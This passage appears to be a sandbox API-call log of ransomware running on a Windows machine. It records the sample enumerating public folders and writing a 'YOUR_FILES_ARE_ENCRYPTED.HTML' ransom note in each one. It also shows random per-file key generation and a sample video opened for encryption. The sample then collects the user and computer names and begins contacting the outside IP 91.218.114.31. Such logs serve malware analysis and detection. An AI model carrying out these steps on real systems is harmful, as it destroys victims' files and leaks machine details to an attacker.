ftCreationTime.dwHighDateTime=0x1cbf8b8, ftLastAccessTime.dwLowDateTime=0xbc330fc8, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xbc330fc8, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x940000, dwReserved0=0x0, dwReserved1=0x60, cFileName="win7_scenic-demoshort_raw.wtv", cAlternateFileName="WIN7_S~1.WTV")) returned 1 [0171.849] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv") returned 74 [0171.849] lstrcmpW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.849] PathFindExtensionW (pszPath="win7_scenic-demoshort_raw.wtv") returned=".wtv" [0171.849] lstrlenW (lpString=".wtv") returned 4 [0171.849] PathFindExtensionW (pszPath="win7_scenic-demoshort_raw.wtv") returned=".wtv" [0171.849] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc371f54c, ftCreationTime.dwHighDateTime=0x1cbf8b8, ftLastAccessTime.dwLowDateTime=0xbc330fc8, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xbc330fc8, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x940000, dwReserved0=0x0, dwReserved1=0x60, cFileName="win7_scenic-demoshort_raw.wtv", cAlternateFileName="WIN7_S~1.WTV")) returned 0 [0171.849] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0171.849] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 74 [0171.849] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\public\\recorded tv\\sample media\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f8 [0171.852] WriteFile (in: hFile=0x5f8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0171.854] CloseHandle (hObject=0x5f8) returned 1 [0171.854] GetProcessHeap () returned 0x270000 [0171.854] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.854] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xc371f54c, ftCreationTime.dwHighDateTime=0x1cbf8b8, ftLastAccessTime.dwLowDateTime=0xd95e54e0, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xc371f54c, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Sample Media", cAlternateFileName="SAMPLE~1")) returned 0 [0171.854] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0171.855] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 61 [0171.855] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\public\\recorded tv\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0171.860] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0171.862] CloseHandle (hObject=0x5a0) returned 1 [0171.862] GetProcessHeap () returned 0x270000 [0171.863] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74081a0 | out: hHeap=0x270000) returned 1 [0171.863] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa191445, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x6b38bbf8, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0x6b38bbf8, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Videos", cAlternateFileName="")) returned 1 [0171.863] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos") returned 26 [0171.863] GetProcessHeap () returned 0x270000 [0171.863] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74081a0 [0171.863] lstrcpyW (in: lpString1=0x74081a0, lpString2="\\\\?\\C:\\Users\\Public\\Videos" | out: lpString1="\\\\?\\C:\\Users\\Public\\Videos") returned="\\\\?\\C:\\Users\\Public\\Videos" [0171.863] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Videos", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Videos\\*") returned="\\\\?\\C:\\Users\\Public\\Videos\\*" [0171.863] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa191445, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x6b38bbf8, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0x6b38bbf8, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0171.863] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa191445, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x6b38bbf8, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0x6b38bbf8, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.864] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6b38bbf8, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0x6b38bbf8, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0x6b38bbf8, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0171.864] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\desktop.ini") returned 38 [0171.864] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.864] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.864] lstrlenW (lpString=".ini") returned 4 [0171.864] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.864] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe50f3de2, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0x6b3fe018, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Sample Videos", cAlternateFileName="SAMPLE~1")) returned 1 [0171.864] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos") returned 40 [0171.864] GetProcessHeap () returned 0x270000 [0171.864] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0171.864] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos" | out: lpString1="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos") returned="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos" [0171.864] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\*") returned="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\*" [0171.864] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe50f3de2, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0x6b3fe018, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0171.865] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe50f3de2, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0x6b3fe018, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.865] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xe50f3de2, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe1ce1c42, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0x6b3d7eb8, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x146, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0171.865] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini") returned 52 [0171.865] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.865] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.865] lstrlenW (lpString=".ini") returned 4 [0171.865] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.865] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe50f3de2, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe1c496c1, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe1ce1c42, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x1907b8a, dwReserved0=0x0, dwReserved1=0x60, cFileName="Wildlife.wmv", cAlternateFileName="")) returned 1 [0171.865] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv") returned 53 [0171.865] lstrcmpW (lpString1="Wildlife.wmv", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.865] PathFindExtensionW (pszPath="Wildlife.wmv") returned=".wmv" [0171.865] lstrlenW (lpString=".wmv") returned 4 [0171.865] PathFindExtensionW (pszPath="Wildlife.wmv") returned=".wmv" [0171.865] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0171.866] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5f4 [0171.866] GetFileSizeEx (in: hFile=0x5f4, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=26246026) returned 1 [0171.866] GetProcessHeap () returned 0x270000 [0171.866] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x755a700 [0171.868] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="51") returned 2 [0171.868] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="AA") returned 2 [0171.868] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="D5") returned 2 [0171.868] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="19") returned 2 [0171.868] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="F9") returned 2 [0171.868] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="EB") returned 2 [0171.868] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="2E") returned 2 [0171.868] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="5C") returned 2 [0171.868] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="0B") returned 2 [0171.868] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="1A") returned 2 [0171.868] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="06") returned 2 [0171.868] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="02") returned 2 [0171.868] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="58") returned 2 [0171.868] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="A5") returned 2 [0171.868] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="CB") returned 2 [0171.869] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="55") returned 2 [0171.869] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="67") returned 2 [0171.869] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="8B") returned 2 [0171.869] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="5C") returned 2 [0171.869] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="71") returned 2 [0171.869] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="1F") returned 2 [0171.869] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="2F") returned 2 [0171.869] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="5B") returned 2 [0171.869] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="8C") returned 2 [0171.869] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="3F") returned 2 [0171.869] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="88") returned 2 [0171.869] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="B3") returned 2 [0171.869] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="65") returned 2 [0171.869] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="84") returned 2 [0171.869] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="08") returned 2 [0171.869] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="6C") returned 2 [0171.870] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="7B") returned 2 [0171.870] lstrcpyW (in: lpString1=0x756a7b4, lpString2="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv" | out: lpString1="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv") returned="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv" [0171.870] CreateIoCompletionPort (FileHandle=0x5f4, ExistingCompletionPort=0x3a0, CompletionKey=0x755a700, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0171.870] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x755a700, lpOverlapped=0x755a700) returned 1 [0171.870] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe50f3de2, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe1c496c1, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe1ce1c42, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x1907b8a, dwReserved0=0x0, dwReserved1=0x60, cFileName="Wildlife.wmv", cAlternateFileName="")) returned 0 [0171.870] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0171.871] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 70 [0171.871] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\public\\videos\\sample videos\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f8 [0171.871] WriteFile (in: hFile=0x5f8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0171.873] CloseHandle (hObject=0x5f8) returned 1 [0171.873] GetProcessHeap () returned 0x270000 [0171.874] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.874] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe50f3de2, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0x6b3fe018, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Sample Videos", cAlternateFileName="SAMPLE~1")) returned 0 [0171.874] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0171.874] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 56 [0171.874] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\public\\videos\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0171.875] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0171.877] CloseHandle (hObject=0x5a0) returned 1 [0171.877] GetProcessHeap () returned 0x270000 [0171.878] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74081a0 | out: hHeap=0x270000) returned 1 [0171.878] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa191445, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x6b38bbf8, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0x6b38bbf8, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Videos", cAlternateFileName="")) returned 0 [0171.878] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0171.878] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 49 [0171.878] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\public\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0171.879] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0171.881] CloseHandle (hObject=0x4a4) returned 1 [0171.881] GetProcessHeap () returned 0x270000 [0171.882] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74ea008 | out: hHeap=0x270000) returned 1 [0171.882] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa145187, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xc371f54c, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xc371f54c, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 0 [0171.882] FindClose (in: hFindFile=0x42f30c0 | out: hFindFile=0x42f30c0) returned 1 [0171.882] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 42 [0171.882] CreateFileW (lpFileName="\\\\?\\C:\\Users\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x580 [0171.882] WriteFile (in: hFile=0x580, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe744, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe744*=0x3c00, lpOverlapped=0x0) returned 1 [0171.884] CloseHandle (hObject=0x580) returned 1 [0171.884] GetProcessHeap () returned 0x270000 [0171.885] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0171.885] FindNextFileW (in: hFindFile=0x42f2fc0, lpFindFileData=0x4ebe784 | out: lpFindFileData=0x4ebe784*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa191445, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x7d2061a0, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0x7d2061a0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x4ebe844, cFileName="Windows", cAlternateFileName="")) returned 1 [0171.885] FindNextFileW (in: hFindFile=0x42f2fc0, lpFindFileData=0x4ebe784 | out: lpFindFileData=0x4ebe784*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa191445, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x7d2061a0, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0x7d2061a0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x4ebe844, cFileName="Windows", cAlternateFileName="")) returned 0 [0171.885] FindClose (in: hFindFile=0x42f2fc0 | out: hFindFile=0x42f2fc0) returned 1 [0171.885] wnsprintfW (in: pszDest=0x430df38, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 36 [0171.885] CreateFileW (lpFileName="\\\\?\\C:\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x57c [0171.886] WriteFile (in: hFile=0x57c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebea50, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebea50*=0x3c00, lpOverlapped=0x0) returned 1 [0171.888] CloseHandle (hObject=0x57c) returned 1 [0171.890] GetProcessHeap () returned 0x270000 [0171.891] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x430df38 | out: hHeap=0x270000) returned 1 [0171.891] GetProcessHeap () returned 0x270000 [0171.892] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x42fdf30 | out: hHeap=0x270000) returned 1 [0171.894] Sleep (dwMilliseconds=0x1388) [0176.904] GetUserNameExA (in: NameFormat=0x1, lpNameBuffer=0x4ebe62c, nSize=0x4ebea90 | out: lpNameBuffer="", nSize=0x4ebea90) returned 0x0 [0176.905] GetUserNameA (in: lpBuffer=0x4ebe62c, pcbBuffer=0x4ebea8c | out: lpBuffer="5AlR3U30D3", pcbBuffer=0x4ebea8c) returned 1 [0176.905] GetComputerNameExA (in: NameType=0x3, lpBuffer=0x4ebe22c, nSize=0x4ebea90 | out: lpBuffer="mYB7za2af", nSize=0x4ebea90) returned 1 [0176.906] GetProcessHeap () returned 0x270000 [0176.906] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x78) returned 0x316b18 [0176.906] InternetCrackUrlA (in: lpszUrl="http://91.218.114.31", dwUrlLength=0x14, dwFlags=0x0, 